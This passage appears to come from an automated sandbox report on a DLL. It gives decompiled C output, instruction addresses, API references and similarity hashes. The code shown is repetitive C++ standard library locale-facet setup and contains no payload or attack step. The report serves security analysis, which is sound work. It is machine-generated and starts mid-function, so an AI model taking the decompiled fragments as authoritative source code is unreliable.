																																								E6D478A0B(__eflags, _t769);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6d53fdc4 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6D478A0B(__eflags, _t768);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6d53fdec = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6D478A0B(__eflags, _t767);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6d53fdd8 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6D478A0B(__eflags, _t766);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6d53fddc = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6D478A0B(__eflags, _t765);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6d53fe08 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6D478A0B(__eflags, _t764);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6d53fe0c = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6D478A0B(__eflags, _t763);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6d53fdd4 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6D478A0B(__eflags, _t762);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6d53fe04 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6D478A0B(__eflags, _t761);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6d53fdd0 = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6D478A0B(__eflags, _t760);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6d53fe00 = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6D478A0B(__eflags, _t759);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6d53fdcc = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6D478A0B(__eflags, _t758);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6d53fdfc = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}

0x6d480612
0x6d480612
0x6d480612
0x6d480619
0x6d480623
0x6d480628
0x6d480633
0x6d480637
0x6d48063a
0x6d48063f
0x6d480643
0x6d480648
0x6d48064c
0x6d480691
0x6d480694
0x6d4806a0
0x6d48064e
0x6d480650
0x6d480656
0x6d48065c
0x6d480664
0x6d480667
0x6d4806a4
0x6d4806b2
0x6d4806b7
0x6d4806b8
0x6d4806bf
0x6d4806c9
0x6d4806ce
0x6d4806d9
0x6d4806dd
0x6d4806e0
0x6d4806e5
0x6d4806ee
0x6d4806f0
0x6d4806f2
0x6d480737
0x6d48073a
0x6d480746
0x6d4806f4
0x6d4806f4
0x6d4806f6
0x6d4806fc
0x6d480702
0x6d48070a
0x6d48070d
0x6d48074a
0x6d480758
0x6d48075d
0x6d48075e
0x6d480765
0x6d48076f
0x6d480774
0x6d48077f
0x6d480783
0x6d480786
0x6d48078b
0x6d480794
0x6d480796
0x6d480798
0x6d4807dd
0x6d4807e0
0x6d4807ec
0x6d48079a
0x6d48079a
0x6d48079c
0x6d4807a2
0x6d4807a8
0x6d4807b0
0x6d4807b3
0x6d4807f0
0x6d4807fe
0x6d480803
0x6d480804
0x6d48080b
0x6d480815
0x6d48081a
0x6d480825
0x6d480829
0x6d48082c
0x6d480831
0x6d48083a
0x6d48083c
0x6d48083e
0x6d480883
0x6d480886
0x6d480892
0x6d480840
0x6d480840
0x6d480842
0x6d480848
0x6d48084e
0x6d480856
0x6d480859
0x6d480896
0x6d4808a4
0x6d4808a9
0x6d4808aa
0x6d4808b1
0x6d4808bb
0x6d4808c0
0x6d4808cb
0x6d4808cf
0x6d4808d2
0x6d4808d7
0x6d4808e0
0x6d4808e2
0x6d4808e4
0x6d480929
0x6d48092c
0x6d480938
0x6d4808e6
0x6d4808e6
0x6d4808e8
0x6d4808ee
0x6d4808f4
0x6d4808fc
0x6d4808ff
0x6d48093c
0x6d48094a
0x6d48094f
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480986
0x6d480988
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c
0x6d48070f
0x6d48070f
0x6d480712
0x6d480716
0x6d48071a
0x6d480727
0x6d48072f
0x6d480731
0x00000000
0x6d480731
0x6d4806f8
0x6d4806f8
0x00000000
0x6d4806f8
0x6d4806f6
0x6d480669
0x6d480669
0x6d48066c
0x6d480670
0x6d480674
0x6d480681
0x6d480689
0x6d48068b
0x00000000
0x6d48068b
0x6d480652
0x6d480652
0x00000000
0x6d480652
0x6d480650

APIs

__EH_prolog3.LIBCMT ref: 6D480619
std::_Lockit::_Lockit.LIBCPMT ref: 6D480623

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

messages.LIBCPMT ref: 6D48065D
std::_Facet_Register.LIBCPMT ref: 6D480674
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480694
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4806B2

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 6fb30bb39e606eb83e45ae3da866fc26047d7424c60119d1a76a2ce4d966db58
Instruction ID: bf55b2ccaeb9bde9b5476912c0cd11da5956d0c329e2bdaf73b2ad1eeb8fe921
Opcode Fuzzy Hash: 6fb30bb39e606eb83e45ae3da866fc26047d7424c60119d1a76a2ce4d966db58
Instruction Fuzzy Hash: 7A11A0328042199BCF05DB65C844EEE7775AF84354F2A040DD616BB390DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4806B8, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D4806B8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;
				void* _t774;

				_t715 = __edx;
				_t544 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t770 - 0x14, 0);
				_t735 =  *0x6d53fdcc; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6D451D10();
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6D476A77(_t770 - 0x14);
					return E6D490E67(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6D4823BD(__ebx, _t547, __edx, _t717, _t735, __eflags, _t774) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t770 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t717, _t735);
							E6D476A10(_t770 - 0x14, 0);
							_t736 =  *0x6d53fe00; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6D451D10();
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6D476A77(_t770 - 0x14);
								return E6D490E67(_t718);
							} else {
								__eflags = _t736;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6D482425(_t544, _t554, __edx, _t718, _t736, __eflags, _t774) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t770 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t544, _t718, _t736);
										E6D476A10(_t770 - 0x14, 0);
										_t737 =  *0x6d53fdd0; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6D451D10();
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6D476A77(_t770 - 0x14);
											return E6D490E67(_t719);
										} else {
											__eflags = _t737;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6D48248D(_t544, _t561, __edx, _t719, _t737, __eflags, _t774) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t770 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t544, _t719, _t737);
													E6D476A10(_t770 - 0x14, 0);
													_t738 =  *0x6d53fe04; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6D451D10();
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6D476A77(_t770 - 0x14);
														return E6D490E67(_t720);
													} else {
														__eflags = _t738;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6D4824F5(_t544, _t568, _t715, _t720, _t738, __eflags, _t774) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t544, _t720, _t738);
																E6D476A10(_t770 - 0x14, 0);
																_t739 =  *0x6d53fdd4; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6D451D10();
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6D476A77(_t770 - 0x14);
																	return E6D490E67(_t721);
																} else {
																	__eflags = _t739;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6D48255D(_t544, _t575, _t715, _t721, _t739, __eflags, _t774) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t544, _t721, _t739);
																			E6D476A10(_t770 - 0x14, 0);
																			_t740 =  *0x6d53fe0c; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6D451D10();
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6D476A77(_t770 - 0x14);
																				return E6D490E67(_t722);
																			} else {
																				__eflags = _t740;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6D4825C5(_t544, _t582, _t715, _t722, _t740, __eflags, _t774) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t544, _t722, _t740);
																						E6D476A10(_t770 - 0x14, 0);
																						_t741 =  *0x6d53fe08; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6D451D10();
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6D476A77(_t770 - 0x14);
																							return E6D490E67(_t723);
																						} else {
																							__eflags = _t741;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6D482649(_t544, _t589, _t715, _t723, _t741, __eflags, _t774) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t544, _t723, _t741);
																									E6D476A10(_t770 - 0x14, 0);
																									_t742 =  *0x6d53fddc; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6D451D10();
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6D476A77(_t770 - 0x14);
																										return E6D490E67(_t724);
																									} else {
																										__eflags = _t742;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6D4826CE(_t544, _t596, _t715, _t724, _t742, __eflags, _t774) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t544, _t724, _t742);
																												E6D476A10(_t770 - 0x14, 0);
																												_t743 =  *0x6d53fdd8; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6D451D10();
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6D476A77(_t770 - 0x14);
																													return E6D490E67(_t725);
																												} else {
																													__eflags = _t743;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6D482752(_t544, _t603, _t715, _t725, _t743, __eflags, _t774) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t544, _t725, _t743);
																															E6D476A10(_t770 - 0x14, 0);
																															_t744 =  *0x6d53fdec; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6D451D10();
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6D476A77(_t770 - 0x14);
																																return E6D490E67(_t726);
																															} else {
																																__eflags = _t744;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6D4827D7(_t544, _t610, _t715, _t726, _t744, __eflags, _t774) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t544, _t726, _t744);
																																		E6D476A10(_t770 - 0x14, 0);
																																		_t745 =  *0x6d53fdc4; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6D451D10();
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6D452140( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6D476A77(_t770 - 0x14);
																																			return E6D490E67(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6D48283F(_t544, _t617, _t715, _t727, _t745, __eflags, _t774) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
																																					E6D4924F4(_t770 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t544, _t727, _t745);
																																					E6D476A10(_t770 - 0x14, 0);
																																					_t746 =  *0x6d53fdf0; // 0x0
